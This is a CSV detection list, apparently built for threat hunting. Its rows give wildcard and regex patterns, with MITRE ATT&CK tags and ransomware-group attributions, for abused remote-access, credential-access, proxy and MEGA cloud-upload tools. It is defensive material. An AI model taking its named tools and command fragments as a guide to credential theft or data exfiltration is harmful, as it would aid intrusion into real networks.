"*\LMIRTechConsole.exe*",".{0,1000}\\LMIRTechConsole\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMITrs-*.trs*",".{0,1000}\\LMITrs\-.{0,1000}\.trs.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LogMeIn Rescue Applet\LMIR*",".{0,1000}\\LogMeIn\sRescue\sApplet\\LMIR.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LogMeIn Rescue Applet\LMIR*",".{0,1000}\\LogMeIn\sRescue\sApplet\\LMIR.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LogMeIn Rescue AVI Codec\*",".{0,1000}\\LogMeIn\sRescue\sAVI\sCodec\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\logmein rescue technician console\*",".{0,1000}\\logmein\srescue\stechnician\sconsole\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LogMeIn\Dumps\*",".{0,1000}\\LogMeIn\\Dumps\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LogMeInRescue_ipc*",".{0,1000}\\LogMeInRescue_ipc.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A"
"*\LogMeInRescue_rarc_r_*",".{0,1000}\\LogMeInRescue_rarc_r_.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A"
"*\LogMeInRescue_rarc_w_*",".{0,1000}\\LogMeInRescue_rarc_w_.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A"
"*\LogMeInRescueTechnicianConsole_x64*",".{0,1000}\\LogMeInRescueTechnicianConsole_x64.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\LogMeIn\*",".{0,1000}\\ProgramData\\LogMeIn\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ractrlkeyhook.dll*",".{0,1000}\\ractrlkeyhook\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RescueWinRTLib.dll*",".{0,1000}\\RescueWinRTLib\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RescueWinRTLib.dll*",".{0,1000}\\RescueWinRTLib\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Root\InventoryApplicationFile\support-logmeinr*",".{0,1000}\\Root\\InventoryApplicationFile\\support\-logmeinr.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RunOnce\*LogMeInRescue_*",".{0,1000}\\RunOnce\\.{0,1000}LogMeInRescue_.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Software\LogMeInRescue\*",".{0,1000}\\Software\\LogMeInRescue\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\LogMeIn Rescue\*",".{0,1000}\\Start\sMenu\\Programs\\LogMeIn\sRescue\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\LogMeIn*",".{0,1000}\\Start\sMenu\\Programs\\LogMeIn.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<Data>LogMeIn, Inc.</Data>*",".{0,1000}\<Data\>LogMeIn,\sInc\.\<\/Data\>.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*9d2ce0345f4ee5798a49a8a13e33c7502a2ac655*",".{0,1000}9d2ce0345f4ee5798a49a8a13e33c7502a2ac655.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*control.*.logmeinrescue.com*",".{0,1000}control\..{0,1000}\.logmeinrescue\.com.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*control.rsc-app*.logmeinrescue.com",".{0,1000}control\.rsc\-app.{0,1000}\.logmeinrescue\.com","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://secure.logmeinrescue.com/R?i=2&Code=*",".{0,1000}https\:\/\/secure\.logmeinrescue\.com\/R\?i\=2\&Code\=.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://secure.logmeinrescue.com/TechnicianConsole/Launch*",".{0,1000}https\:\/\/secure\.logmeinrescue\.com\/TechnicianConsole\/Launch.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*LMI_RescueRC.exe*",".{0,1000}LMI_RescueRC\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*LMIGuardianDll.dll*",".{0,1000}LMIGuardianDll\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*LMIGuardianSvc.exe*",".{0,1000}LMIGuardianSvc\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*LogMeIn Rescue Technician Console.lnk*",".{0,1000}LogMeIn\sRescue\sTechnician\sConsole\.lnk.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*LogMeInRescueTechnicianConsoleApp.msi*",".{0,1000}LogMeInRescueTechnicianConsoleApp\.msi.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Support-LogMeInRescue.exe*",".{0,1000}Support\-LogMeInRescue\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Support-LogMeInRescue.exe*",".{0,1000}Support\-LogMeInRescue\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SUPPORT-LOGMEINRESCUE.EXE-*",".{0,1000}SUPPORT\-LOGMEINRESCUE\.EXE\-.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*turn.console.gotoassist.com*",".{0,1000}turn\.console\.gotoassist\.com.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ls \\1*.*.*.*\IPC$\*",".{0,1000}ls\s\\\\1.{0,1000}\..{0,1000}\..{0,1000}\..{0,1000}\\IPC\$\\.{0,1000}","greyware_tool_keyword","ls","list remote pipename ","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://outflank.nl/blog/2023/10/19/listing-remote-named-pipes/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*/lsa-whisperer-*.zip*",".{0,1000}\/lsa\-whisperer\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","lsa-whisperer","Tools for interacting with authentication packages using their individual message protocols","T1556.002 - T1003.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/EvanMcBroom/lsa-whisperer","1","1","N/A","N/A","6","3","282","26","2024-08-26T15:53:54Z","2022-08-04T14:35:45Z"
"*/lsa-whisperer.git*",".{0,1000}\/lsa\-whisperer\.git.{0,1000}","greyware_tool_keyword","lsa-whisperer","Tools for interacting with authentication packages using their individual message protocols","T1556.002 - T1003.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/EvanMcBroom/lsa-whisperer","1","1","N/A","N/A","6","3","282","26","2024-08-26T15:53:54Z","2022-08-04T14:35:45Z"
"*\lsa-whisperer-*",".{0,1000}\\lsa\-whisperer\-.{0,1000}","greyware_tool_keyword","lsa-whisperer","Tools for interacting with authentication packages using their individual message protocols","T1556.002 - T1003.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/EvanMcBroom/lsa-whisperer","1","0","N/A","N/A","6","3","282","26","2024-08-26T15:53:54Z","2022-08-04T14:35:45Z"
"*EvanMcBroom/lsa-whisperer*",".{0,1000}EvanMcBroom\/lsa\-whisperer.{0,1000}","greyware_tool_keyword","lsa-whisperer","Tools for interacting with authentication packages using their individual message protocols","T1556.002 - T1003.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/EvanMcBroom/lsa-whisperer","1","1","N/A","N/A","6","3","282","26","2024-08-26T15:53:54Z","2022-08-04T14:35:45Z"
"*/.ltproxy.yml*",".{0,1000}\/\.ltproxy\.yml.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*/etc/ltproxy.yml*",".{0,1000}\/etc\/ltproxy\.yml.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*/LTProxy.git*",".{0,1000}\/LTProxy\.git.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","1","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*/tmp/.ltproxy_proxychains_*",".{0,1000}\/tmp\/\.ltproxy_proxychains_.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*\LTProxy-main*","\\LTProxy\-main","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*ac5f344727467b6ad9743b8ffa2646ed73180dbdb97224feec6c54c5160a1984*",".{0,1000}ac5f344727467b6ad9743b8ffa2646ed73180dbdb97224feec6c54c5160a1984.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","#filehash","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*ipt2socks -R -n 9999 -j 50 -u * -s * -l *",".{0,1000}ipt2socks\s\-R\s\-n\s9999\s\-j\s50\s\-u\s.{0,1000}\s\-s\s.{0,1000}\s\-l\s.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*L-codes/LTProxy*",".{0,1000}L\-codes\/LTProxy.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","1","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*ltproxy restart*",".{0,1000}ltproxy\srestart.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*ltproxy start*",".{0,1000}ltproxy\sstart.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*ltproxy stop*",".{0,1000}ltproxy\sstop.{0,1000}","greyware_tool_keyword","LTProxy","Linux Transparent Proxy (Similar to Proxifiter)","T1090 - T1573.001 - T1571 - T1071.001","TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/L-codes/LTProxy","1","0","N/A","N/A","10","1","28","5","2024-02-04T09:49:02Z","2021-11-11T15:17:54Z"
"*UCCAPI/16.0.13328.20130 OC/16.0.13426.20234*",".{0,1000}UCCAPI\/16\.0\.13328\.20130\sOC\/16\.0\.13426\.20234.{0,1000}","greyware_tool_keyword","lyncsmash","default user agent used by lyncsmash.py - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","greyware_tools high risks of false positives","8","4","330","67","2024-06-27T09:47:20Z","2016-05-20T04:32:41Z"
"*macchanger -r *",".{0,1000}macchanger\s\-r\s.{0,1000}","greyware_tool_keyword","macchanger","changing mac address with macchanger","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A"
"*https://maildrop.cc/inbox/?mailbox=*",".{0,1000}https\:\/\/maildrop\.cc\/inbox\/\?mailbox\=.{0,1000}","greyware_tool_keyword","maildrop","disposable email address to use anytime.","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://maildrop.cc/","1","1","N/A","N/A","4","5","N/A","N/A","N/A","N/A"
"*bdlcnpceagnkjnjlbbbcepohejbheilk*",".{0,1000}bdlcnpceagnkjnjlbbbcepohejbheilk.{0,1000}","greyware_tool_keyword","Malus VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*.userstorage.mega.co.nz/ul/*",".{0,1000}\.userstorage\.mega\.co\.nz\/ul\/.{0,1000}","greyware_tool_keyword","mega.co.nz","uploading data to mega cloud","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* MEGAcmd.sh*",".{0,1000}\sMEGAcmd\.sh.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*$(mega-whoami)*",".{0,1000}\$\(mega\-whoami\).{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*$MEGACMDSHELL*",".{0,1000}\$MEGACMDSHELL.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*%LOCALAPPDATA%\MEGAcmd*",".{0,1000}\%LOCALAPPDATA\%\\MEGAcmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/apache-megacmd.conf*",".{0,1000}\/apache\-megacmd\.conf.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/Applications/MEGAcmd.app*",".{0,1000}\/Applications\/MEGAcmd\.app.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAclient.exe*",".{0,1000}\/MEGAclient\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/MEGAcmd.exe*",".{0,1000}\/MEGAcmd\.exe.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","1","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
